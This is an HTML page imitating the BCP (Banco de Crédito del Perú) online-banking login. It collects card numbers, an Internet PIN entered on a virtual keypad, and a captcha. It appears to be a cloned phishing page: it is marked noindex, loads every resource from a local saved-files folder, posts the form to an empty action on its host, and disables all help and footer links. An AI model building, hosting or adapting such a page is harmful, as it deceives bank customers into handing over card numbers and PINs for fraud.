<!DOCTYPE html>
<html class="no-js" lang="en" id="html">
<head>
    <meta name="robots" content="noindex"/>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
    <title>Banco de Cr&eacute;dito&gt;&gt;BCP&gt;&gt;</title>
    <meta content="ES" http-equiv="Content-Language">
    <meta content="" name="description">
    <meta content="" name="keywords">
    <meta content="" name="author">
    <meta content="Global" name="distribution">
    <meta content="" name="copyright">
    <meta content="" name="robots">
    <meta content="no-cache" http-equiv="pragma">
    <meta content="no-cache" http-equiv="cache-control">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="" name="description">
    <meta content="initial-scale=1.0" name="viewport">
    <link type="text/css" rel="stylesheet" href="./files_files/site.login.css">
    <script type="text/javascript" src="./files_files/jquery.js"></script>
    <script src="./files_files/inputarj.js" language="JavaScript"></script>
    <script src="./files_files/comunes.js" language="JavaScript"></script>
    <script src="./files_files/login.js" language="JavaScript"></script>
    <script src="./files_files/rsa_v2.js" language="JavaScript"></script>
    <script src="./files_files/json2.js" language="JavaScript"></script>


    <script>
        $(function () {
            if (window.PIE) {
                $('#login').each(function () {
                    PIE.attach(this);
                });
                $('#btn_ingresar').each(function () {
                    PIE.attach(this);
                });
            }
        });
    </script>
    <script type="text/javascript">
        $(document).ready(function () {
            setTimeout("$.upgradebrowsers()", 1000);
        });
    </script>
    <script language="JavaScript">
        document.oncontextmenu = disableRightClick;
        var NS_NAV = (window.Event) ? 1 : 0;
        var bines = new Array(
            new Bines('45578800', '01'), new Bines('45578807', '01'), new Bines('40031001', '04'), new Bines('40998001', '04'), new Bines('49124600', '08'), new Bines('45578801', '01'), new Bines('45578810', '01'), new Bines('45578811', '01'), new Bines('49124610', '08'), new Bines('49124611', '08'), new Bines('43103701', '04'), new Bines('43103801', '04'), new Bines('45578802', '01'), new Bines('45578808', '01'), new Bines('45578809', '01'), new Bines('45578803', '01'), new Bines('455787', '03'), new Bines('402162', '04'), new Bines('450646', '04'), new Bines('450645', '04'), new Bines('448717', '04'), new Bines('455789', '04'), new Bines('491908', '04'), new Bines('491907', '04'), new Bines('457033', '04'), new Bines('000300', '06'), new Bines('377891', '05'), new Bines('377893', '05'), new Bines('377894', '05'), new Bines('377890', '05'), new Bines('784000', '04'), new Bines('421350', '04'), new Bines('400310', '04'), new Bines('409980', '04'), new Bines('407411', '04'), new Bines('463401', '04'), new Bines('463402', '04'), new Bines('463403', '04'), new Bines('457035', '04'), new Bines('431037', '04'), new Bines('457034', '04'), new Bines('431038', '04'), new Bines('377892', '05'), new Bines('377889', '05'), new Bines('377897', '05'), new Bines('402160', '04'), new Bines('402161', '04'), new Bines('428072', '04'), new Bines('428078', '04'), new Bines('428079', '04'), new Bines('428082', '04'), new Bines('428083', '04'), new Bines('443914', '04'), new Bines('443915', '04'), new Bines('377898', '05'), new Bines('428076', '04'), new Bines('428074', '04'), new Bines('428075', '04'), new Bines('434925', '04'), new Bines('540822', '09'), new Bines('548544', '09'), new Bines('540413', '09'), new Bines('541124', '09'), new Bines('548630', '09'), new Bines('525727', '09'), new Bines('527612', '09'), new Bines('37789', '05'),
            new Bines('00000000', '00')
        )
        var PerfilesTransacciones = new Array(
            new Perfiles('01', 'Credim&aacute;s', '4557880',
                new Array(
                    new Transaccion('1', 'Consulta tus saldos y movimientos', 'AT80'), new Transaccion('164', 'Consulta tus cr&eacute;ditos', 'bcptuscreditos'), new Transaccion('2', 'Consulta tus d&eacute;bitos autom&aacute;ticos', 'AT88'), new Transaccion('100', 'Transferencias entre tus cuentas', 'bcpcuentaspropias1'), new Transaccion('101', 'Transferencias a otras cuentas del BCP', 'bcpcuentasterceros1'), new Transaccion('249339', 'A otros bancos inmediatas', 'bcptransferenciaenlinea'), new Transaccion('102', 'Transferencias al exterior', 'bcptransfexterior1'), new Transaccion('107', 'Programa tus transferencias', 'bcpagenda1'), new Transaccion('105', 'Agenda de transferencias programadas', 'bcpagenda_lista'), new Transaccion('7008', 'Pago de servicios', 'bcppagosfrecuentes'), new Transaccion('60', 'Tus ofertas', 'tus_ofertas'), new Transaccion('202', 'Pago de Letras', 'bcppagoletrasterceros'), new Transaccion('15', 'Cambia tu correo de constancias', 'cambiocorreo'), new Transaccion('1548', 'Pago de tus tarjetas de cr&eacute;dito del BCP', 'pagostarjetas1'), new Transaccion('1599', 'Pago de otras tarjetas de cr&eacute;dito del BCP', 'pagostarjetasterceros1'), new Transaccion('249340', 'A otros bancos inmediatas', 'bcppagostarjetasenlinea'), new Transaccion('4875', 'Disposici&oacute;n de efectivo de tarjeta de cr&eacute;dito', 'disposicionefectivo1'), new Transaccion('14', 'Cambia tu clave de Internet', 'cambioclave'), new Transaccion('4562', 'Giros Nacionales', 'getgirosalias'), new Transaccion('1875', 'Afilia tu tarjeta de cr&eacute;dito a tu Credim&aacute;s', 'bcpafiliacion1'), new Transaccion('1187', 'Desafilia tu tarjeta de tu Credim&aacute;s', 'bcpdesafiliacion1'), new Transaccion('1154', 'Afilia tu CTS a tu Credim&aacute;s', 'bcpafiliacion1_cts'), new Transaccion('8497', 'Desafilia tu CTS de tu Credim&aacute;s', 'bcpdesafiliacion1_cts')
                )), new Perfiles('08', 'Credim&aacute;s Negocios', '49124600',
                new Array(
                    new Transaccion('1', 'Consulta tus saldos y movimientos', 'AT80'), new Transaccion('2', 'Consulta tus d&eacute;bitos autom&aacute;ticos', 'AT88'), new Transaccion('100', 'Transferencias entre tus cuentas', 'bcpcuentaspropias1'), new Transaccion('101', 'Transferencias a otras cuentas del BCP', 'bcpcuentasterceros1'), new Transaccion('102', 'Transferencias al exterior', 'bcptransfexterior1'), new Transaccion('107', 'Programa tus transferencias', 'bcpagenda1'), new Transaccion('105', 'Agenda de transferencias programadas', 'bcpagenda_lista'), new Transaccion('7008', 'Pago de servicios', 'bcppagosfrecuentes'), new Transaccion('60', 'Tus ofertas', 'tus_ofertas'), new Transaccion('202', 'Pago de Letras', 'bcppagoletrasterceros'), new Transaccion('15', 'Cambia tu correo de constancias', 'cambiocorreo'), new Transaccion('1548', 'Pago de tus tarjetas de cr&eacute;dito del BCP', 'pagostarjetas1'), new Transaccion('1599', 'Pago de otras tarjetas de cr&eacute;dito del BCP', 'pagostarjetasterceros1'), new Transaccion('4875', 'Disposici&oacute;n de efectivo de tarjeta de cr&eacute;dito', 'disposicionefectivo1'), new Transaccion('14', 'Cambia tu clave de Internet', 'cambioclave'), new Transaccion('4562', 'Giros Nacionales', 'getgirosalias'), new Transaccion('1875', 'Afilia tu tarjeta de cr&eacute;dito a tu Credim&aacute;s', 'bcpafiliacion1'), new Transaccion('1187', 'Desafilia tu tarjeta de tu Credim&aacute;s', 'bcpdesafiliacion1')
                )), new Perfiles('09', 'Mastercard', '',
                new Array(
                    new Transaccion('1', 'Consulta tus saldos y movimientos', 'AT80')
                )), new Perfiles('03', 'Tarjeta de Compras en Internet', '455787',
                new Array(
                    new Transaccion('1', 'Consulta tus saldos y movimientos', 'AT80'), new Transaccion('7008', 'Pago de servicios', 'bcppagosfrecuentes'), new Transaccion('202', 'Pago de Letras', 'bcppagoletrasterceros'), new Transaccion('15', 'Cambia tu correo de constancias', 'cambiocorreo'), new Transaccion('14', 'Cambia tu clave de Internet', 'cambioclave')
                )), new Perfiles('04', 'Tarjeta de Cr&eacute;dito VISA', '',
                new Array(
                    new Transaccion('1', 'Consulta tus saldos y movimientos', 'AT80')
                )), new Perfiles('05', 'American Express', '37789',
                new Array(
                    new Transaccion('1', 'Consulta tus saldos y movimientos', 'AT80')
                )), new Perfiles('06', 'V&iacute;aBCP Empresarial', '000300', new Array(
                new Transaccion('1', 'Consulta tus saldos y movimientos', 'AT80'), new Transaccion('2', 'Consulta tus d&eacute;bitos autom&aacute;ticos', 'AT88')))
        );

        function reload() {
            //document.form1.TRANSACTION.value="beginning";
            //document.form1.submit();
        };
        var cardnumberslist = new Array();
    </script>
</head>
<body class="" id="body">
<div id="header">
    <div class="inner wrapper">
        <div class="sp sp-main-logo" id="logo">BCP</div>
    </div>
    <div id="header_metadata">
        <div class="wrapper_new">
            <div style="float:right; margin-top: 9px;" id="clock_header">Esta ventana se cerrar&aacute; en <b>0:45
                segundos. </b></div>
            <div id="barra_add"></div>
            <img class="clock" src="./files_files/clock.png"></div>
    </div>
</div>
<div id="principal">
    <form method="post" action="" name="form1"><input value="REMOTE" name="MQFLAG" type="hidden"><input value="false"
                                                                                                        name="SUBMIT_FLAG"
                                                                                                        type="hidden"><input
            value="0" name="EVENTO" type="hidden"><input value="" name="TRANSACTION" type="hidden"><input value=""
                                                                                                          name="pin"
                                                                                                          type="hidden"><input
            value="at80" name="TRANSACTION_GO" type="hidden"><input value="" name="CARD" type="hidden"><input value=""
                                                                                                              name="CARDTYPE"
                                                                                                              type="hidden"><input
            value="" name="USERNAME" type="hidden"><input value="" name="OPERATION_NUMBER" type="hidden"><input
            value="01" name="OPTION_NICKNAME" type="hidden"><input value="mia" name="ALIAS_NEW" type="hidden"><input
            value="" name="NICKNAME" type="hidden"><input value="X" name="ACTION_NICKNAME" type="hidden"><input value=""
                                                                                                                id="ipaddress"
                                                                                                                name="ipaddress"
                                                                                                                type="hidden"><input
            value="" id="DEVICE_PRINT" name="DEVICE_PRINT" type="hidden"><input value="" id="DEVICE_TOKEN_FSO"
                                                                                name="DEVICE_TOKEN_FSO"
                                                                                type="hidden"><input
            value="F__1489106940059" id="deviceid" name="deviceid" type="hidden"><input value="true" name="CAPTCHAFLAG"
                                                                                        type="hidden"><input
            value="http://windows.microsoft.com/es-es/internet-explorer/download-ie" name="URL_UPDATE_IEXPLORER"
            type="hidden"><input value="https://www.google.com/intl/es/chrome/browser/" name="URL_UPDATE_CHROME"
                                 type="hidden"><input value="http://www.mozilla.org/es-ES/firefox/new/"
                                                      name="URL_UPDATE_FIREFOX" type="hidden"><input
            value="http://support.apple.com/kb/DL1531?viewlocale=es_ES" name="URL_UPDATE_SAFARI" type="hidden"><input
            value="http://www.opera.com/download/" name="URL_UPDATE_OPERA" type="hidden"><input value="" id="ipaddress"
                                                                                                name="ipaddress"
                                                                                                type="hidden"><input
            value="" id="DEVICE_PRINT" name="DEVICE_PRINT" type="hidden">
        <script>
            //startCollection();
            //ProxyCollector.externalIP = document.getElementById('ipaddress').value;
            //window.onload = ProxyCollector.initProxyCollection;
            function obtenerAleatoriox(min, max) {
                return Math.floor(Math.random() * (max - min + 1) + min);
            }

            var formOnLoad = window.onload;
            var numAleatorioX = 1;
            var indiceAleatorioX = 1;

            window.onload = function () {
                ejecutarOnLoad()
            };

            function ejecutarOnLoad() {


                numAleatorioX = obtenerAleatoriox(1, 4);
                indiceAleatorioX = numAleatorioX;
                //console.log(numAleatorioX);
                document.getElementById("numeroKeyPadX").value = indiceAleatorioX;
                document.getElementById("imgKeyBoardx").src = "./files_files/OperacionesEnLinea" + indiceAleatorioX + ".gif?r=" + (Math.random());


                otherCaptcha();
                createSessionUsuario();

                if (formOnLoad != null) {
                    formOnLoad();
                }


            };

        </script>
        <input value="" id="GEO_STATUS" name="GEO_STATUS" type="hidden"><input value="" id="GEO_LONGITUDE"
                                                                               name="GEO_LONGITUDE" type="hidden"><input
                value="" id="GEO_LATITUDE" name="GEO_LATITUDE" type="hidden"><input value="" id="GEO_ALTITUDE"
                                                                                    name="GEO_ALTITUDE"
                                                                                    type="hidden"><input value=""
                                                                                                         id="GEO_HORIZONTALACCURACY"
                                                                                                         name="GEO_HORIZONTALACCURACY"
                                                                                                         type="hidden"><input
                value="" id="GEO_ALTITUDEACCURACY" name="GEO_ALTITUDEACCURACY" type="hidden"><input value=""
                                                                                                    id="GEO_HEADING"
                                                                                                    name="GEO_HEADING"
                                                                                                    type="hidden"><input
                value="" id="GEO_SPEED" name="GEO_SPEED" type="hidden"><input value="" id="GEO_TIMESTAMP"
                                                                              name="GEO_TIMESTAMP" type="hidden"><input
                value="000010" id="PAGE_ID" name="PAGE_ID" type="hidden"><input value="" id="FORMS_DATA"
                                                                                name="FORMS_DATA" type="hidden"><input
                value="" id="DOM_ELEMENTS" name="DOM_ELEMENTS" type="hidden"><input value="" id="JS_EVENTS"
                                                                                    name="JS_EVENTS" type="hidden">
        <div style="margin: 0 auto; width: 445px;" id="content">
            <div style="position:relative;">
                <table cellpadding="0" cellspacing="0" border="0" width="">
                    <tbody>
                    <tr>
                        <td style=" width:398px" id="login" valign="top">
                            <div style="line-height: 12px;" id="up_box"><img src="./files_files/up_box.png"></div>
                            <table style="color: white;" cellspacing="0" cellpadding="0" border="0" id="cont_box"
                                   width="300px">
                                <tbody>
                                <tr style="height:40px;">
                                    <td colspan="3"><h1 class="title"><strong
                                            style="position: absolute;top: 25px;left: 47px;">Ingresa a tus
                                        cuentas</strong></h1></td>
                                    <td>
                                        <div class="icon sp-main-candado"></div>
                                    </td>
                                </tr>
                                <input value="00" name="nickname" type="hidden">
                                <tr>
                                    <td class="alLogin" colspan="2" style="padding-top:5px;" valign="top" height="17"
                                        width="246"><span class="td-title-login">Tu tarjeta</span></td>
                                </tr>
                                <tr>
                                    <td class="alLogin" colspan="2" style="padding-top:7px;">
                                        <span>
                                        <select onchange="changeType();alternateMessageClave()" onkeypress="checkKey(event,1)" style="width: 176px;height: 17px;margin-right:10px" name="CARDTYPE_SHOW" class="txt11blanco" id="bin-tar">
                                            <option value="01">Credim&aacute;s</option>
                                            <option value="08">Credim&aacute;s Negocios</option>
                                            <option value="09">Mastercard</option>
                                            <option value="03">Tarjeta de Compras en Internet</option>
                                            <option value="04">Tarjeta de Cr&eacute;dito VISA</option>
                                            <option value="05">American Express</option>
                                            <option value="06">V&iacute;aBCP Empresarial</option>
                                        </select>
                                        </span>
                                        <input type="hidden" name="numeroKeyPadX" id="numeroKeyPadX">
                                        <input autocomplete="off" maxlength="16" value="4557880" style="width: 130px;" class="txt11blanco" type="hidden" name="CARD_SHOW" id="card_show">
                                        <input autocomplete="off" size="5" maxlength="" id="primero" style="font-size:11px;margin-right:6px;text-align:center;width:35px; border:1px solid #b3b5b7;" class="space">
                                        <input autocomplete="off" size="5" maxlength="4" id="segundo" style="font-size:11px;margin-right:6px;text-align:center;width:35px; border:1px solid #b3b5b7;" class="space">
                                        <input autocomplete="off" size="5" maxlength="4" id="tercero" style="font-size:11px;margin-right:6px;text-align:center;width:35px; border:1px solid #b3b5b7;" class="space">
                                        <input autocomplete="off" size="5" maxlength="4" id="cuarto" style="font-size:11px;margin-right:6px;text-align:center;width:35px; border:1px solid #b3b5b7;" class="space">
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">&nbsp;</td>
                                </tr>
                                <tr>
                                    <td style="padding-top:5px;" colspan="2" valign="top" height="17"
                                        class="alLogin"><span><span class="td-title-login" id="div_nueva">
	                            	&iquest;Deseas grabar tu tarjeta como frecuente?
	                            </span><span style="display: none;" class="td-title-login" id="div_frequente">
	                            	&iquest;Deseas mantener esta tarjeta como frecuente?
	                            </span></span></td>
                                </tr>
                                <tr>
                                    <td style="padding-top:7px" colspan="2" class="alLogin"><select
                                            onchange="javascript:mostraFrecuente();" name="card_favorite"
                                            id="card_favorite">
                                        <option value="no" name="aceitar" id="btnNo" selected="">No</option>
                                        <option value="si" name="aceitar" id="btnSi">Si</option>
                                    </select>
                                        &nbsp;&nbsp;&nbsp;&nbsp;
                                        <input style="width: 160px;" class="txt11blanco" maxlength="20"
                                               name="aliasHidden" id="aliasHidden" type="hidden"><input disabled=""
                                                                                                        style="width: 180px;position: absolute;left: 105px; line-height: 11px;"
                                                                                                        class="txt11blanco"
                                                                                                        maxlength="20"
                                                                                                        name="alias"
                                                                                                        id="alias"
                                                                                                        type="text"
                                                                                                        placeholder="&iquest;Con qu&eacute; nombre?">
                                    </td>
                                </tr>
                                <tr>
                                    <td colspan="2">&nbsp;</td>
                                </tr>
                                <tr>
                                    <td style="padding-bottom: 25px;padding-top:10px">
                                        <table cellpadding="0" cellspacing="0" border="0" width="100%">
                                            <tbody>
                                            <tr>
                                                <td class="alLogin" valign="bottom" width="30%">
                                                    <table width="75" height="84" cellspacing="1" cellpadding="0"
                                                           border="0" class="numpad" id="teclado1"
                                                           style="visibility: visible;">
                                                        <tbody>
                                                        <tr height="84" align="center">
                                                            <td width="75" name="td"><img style="border:0px;"
                                                                                          usemap="#keyboardmap"
                                                                                          height="84" width="75"
                                                                                          id="imgKeyBoardx"
                                                                                          src="./files_files/OperacionesEnLinea2.gif">
                                                                <map name="keyboardmap">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 0, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="1,1,24,20" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 1, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="26,1,49,20" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 2, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="51,1,74,20" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 3, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="1,22,24,41" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 4, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="26,22,49,41" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 5, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="51,22,74,41" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 6, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="1,43,24,62" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 7, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="26,43,49,62" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 8, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="51,43,74,62" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, 9, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="1,64,24,83" shape="rect">
                                                                    <area href="javascript:onPadClickBlockClave4(1, -1, document.form1.pin, document.form1.clave, document.form1.pin, document.form1.clave, 6)"
                                                                          coords="26,64,74,83" shape="rect">
                                                                </map>
                                                            </td>
                                                        </tr>
                                                        </tbody>
                                                    </table>
                                                </td>
                                                <td valign="top" width="70%">
                                                    <table style="color: white;" cellpadding="0" cellspacing="0"
                                                           border="0" width="100%">
                                                        <tbody>
                                                        <tr>
                                                            <td style="padding-left:23px;" valign="top"
                                                                height="18"><span class="td-title-login"
                                                                                  id="div_clave6">
		                                    	Tu Clave de Internet (6 d&iacute;gitos)
		                                    </span><span style="display: none;" class="td-title-login" id="div_clave4">
		                                    	Tu Clave de Internet (4 d&iacute;gitos)
		                                    </span></td>
                                                        </tr>
                                                        <tr>
                                                            <td style="padding-left:23px; padding-top:5px;" valign="top"
                                                                height="30"><input autocomplete="off"
                                                                                   style="width: 127px;"
                                                                                   class="txt11blanco"
                                                                                   onkeypress="checkKey(event,3)"
                                                                                   maxlength="6" id="clave"
                                                                                   readonly="true" name="clave"
                                                                                   type="password"
                                                                                   placeholder="Clave de Internet"></td>
                                                        </tr>
                                                        <tr>
                                                            <td style="padding-left:23px;"><span style="width: 150px;"
                                                                                                 class="td-title-login">
				                            	Ingresa tu Clave de Internet usando el teclado virtual.
				                            </span><span id="div_sub_message_clave6"></span><span style="display: none;"
                                                                                                  id="div_sub_message_clave4"></span>
                                                            </td>
                                                        </tr>
                                                        </tbody>
                                                    </table>
                                                </td>
                                            </tr>
                                            </tbody>
                                        </table>
                                        <table>
                                            <tbody>
                                            <tr>
                                                <td style="padding-bottom: 18px;" class="td-title-login alLogin"
                                                    colspan="2"><img
                                                        style="width:143px; height:34px;padding-top: 30px;padding-bottom: 7px; "
                                                        id="kaptchaimage" src="./files_files/Kaptcha1.jpg"><br>
                                                    <table>
                                                        <tbody>
                                                        <tr class="td-title-login alLogin">
                                                            <td>
                                                                <a style="text-decoration:none; cursor:pointer;padding-left: 25px; padding-right:8px;"
                                                                   onclick="otherCaptcha()">
                                                                    Mostrar otra imagen
                                                                </a></td>
                                                            <td><a style="cursor:pointer;" class="sp sp-main-reload"
                                                                   onclick="otherCaptcha()"></a></td>
                                                        </tr>
                                                        </tbody>
                                                    </table>
                                                </td>
                                                <td style="padding-bottom: 34px;padding-left:15px;">
                                                    <table cellpadding="0" cellspacing="0" border="0" width="100%">
                                                        <tbody>
                                                        <tr class="td-title-login alLogin">
                                                            <td>Ingresa el texto de la imagen.</td>
                                                        </tr>
                                                        <tr>
                                                            <td><input maxlength="6"
                                                                       style="width:155px; border: 1px solid gray;vertical-align: top;margin-top: 3px;"
                                                                       id="kaptchafield" name="kaptchafield" class=""
                                                                       type="kaptcha"></td>
                                                        </tr>
                                                        </tbody>
                                                    </table>
                                                </td>
                                            </tr>
                                            </tbody>
                                        </table>
                                        <table style="margin-left:25px; width: 400px; " cellpadding="0" cellspacing="0"
                                               border="0" align="center">
                                            <tbody>
                                            <tr>
                                                <td align="right">
                                                    <div class="buttons"><input
                                                            onclick="onSubmitRSACollectionLogin();Enviar(&#39;NS7A&#39;);"
                                                            class="btn btn-mini btn-radius" value="Ingresar"
                                                            id="btn_ingresar" name="aceptar" type="button"
                                                            style="margin-top: 20px;"></div>
                                                </td>
                                            </tr>
                                            </tbody>
                                        </table>
                                    </td>
                                </tr>
                                </tbody>
                            </table>
                            <script language="JavaScript">
                                document.getElementById('div_clave4').style.display = 'none';
                                document.getElementById('div_sub_message_clave4').style.display = 'none';
                                document.getElementById('div_frequente').style.display = 'none';
                            </script>
                            <div id="down_box"><img width="448" src="./files_files/down_box.png"></div>
                            <hr>
                        </td>
                    </tr>
                    </tbody>
                </table>
                <div style="position: absolute; left: 483px; bottom:12px; width: 166px;">
                    <div class="log-opt" style="" id="login_options">
                        <ul class="list">
                            <li class="item"><span class="sp sp-main-list-1"></span><a href="javascript: return false;"><strong>Clave
                                de Internet</strong></a>
                                <ul>
                                    <li><a href="javascript: return false;">&iquest;Qu&eacute; es?</a></li>
                                    <li><a href="javascript: return false;">Genera tu Clave de Internet</a></li>
                                    <li><a href="javascript: return false;">Olvidaste tu Clave de Internet</a></li>
                                    <li><a href="javascript: return false;">Cambia tu Clave de Internet</a></li>
                                </ul>
                            </li>
                            <li class="item"><span class="sp sp-main-list-1"></span><a onclick="return false;" href="#"><strong>Operaciones
                                por Internet</strong></a>
                                <ul>
                                    <li><a onclick="return false;" href="#">Aprende a operar en Internet</a></li>
                                    <li><a onclick="return false;" href="#">&iquest;Qu&eacute; operaciones puedo
                                        hacer?</a></li>
                                </ul>
                            </li>
                            <li class="item"><span class="sp sp-main-list-1"></span><a onclick="return false;" href="#"><strong>Tarifas
                                de Internet</strong></a></li>
                            <li style="border-bottom: 0;" class="item"><span class="sp sp-main-list-1"></span><a
                                    onclick="return false;" href="#"><strong>Seguridad en Internet</strong></a></li>
                        </ul>
                    </div>
                    <div class="" style="padding-top: 30px;" id="callcenter"><span class="helper"></span>
                        <small style="margin-bottom: 2px; margin-top: 5px;" class="title">&iquest;Dudas o consultas?
                        </small>
                        <span class="sp sp-main-phone"></span><strong class="phone">311-9898</strong></div>
                </div>
            </div>
        </div>
    </form>
    <script type="text/javascript" src="./files_files/jquery.upgradebrowsers.js"></script>
    <script language="JavaScript">
        inicia();
        genRandomArray(1);
        iniciar(45);
        window.opener = self;
        //self.setTimeout('reload()', 240000);
    </script>
    <script src="./files_files/AC_OETags.js" language="JavaScript"></script>
    <script type="text/javascript" language="JavaScript">
        var ipaddress = document.getElementById('ipaddress').value;
        //field_name : the HTML element id which will get the FSO value.
        //ip_address : the users' ip address.
        var flashVars = "field_name=deviceid&ip_address=" + ipaddress;
        var flashMovie = "./files_files/rsa_fso"; //the name and location of the swf
        if (DetectFlashVer(6, 0, 0)) //if flash minimum version is version 6.0.0
        {	//run the movie
            AC_FL_RunContent(
                'id', 'flash_id',
                'width', '1',
                'height', '1',
                'movie', flashMovie,
                'quality', 'high',
                'bgcolor', '#FFFFFF',
                'flashVars', flashVars
            ); //end AC code
        }

    </script>
    <embed id="flash_id" width="1" height="1" src="" quality="high" bgcolor="#FFFFFF"
           flashvars="field_name=deviceid&amp;ip_address=" type="application/x-shockwave-flash">
    <script language="JavaScript"></script>
</div>
<div id="footer">
    <div class="inner wrapper_new_footer">
        <ul class="menu" id="menu_footer">
            <li class="menu-i first-child"><a class="menu-t" onclick="javascript: return false;" href="#">Pol&iacute;ticas
                de seguridad</a></li>
            <li class="menu-i"><a class="menu-t" onclick="javascript: return false;" href="#">Empieza en V&iacute;a
                BCP</a></li>
            <li class="menu-i"><a class="menu-t" onclick="javascript: return false;" href="#">Cont&aacute;ctanos</a>
            </li>
            <li class="menu-i last-child"><a class="menu-t" onclick="javascript: return false;" href="#">Tarifas en
                Internet</a></li>
        </ul>
        <hr>
        <p id="copy">� 2012 ViaBCP.com Todos los derechos reservados</p>
        <div id="barra_add_footer"></div>
    </div>
</div>
</body>
</html>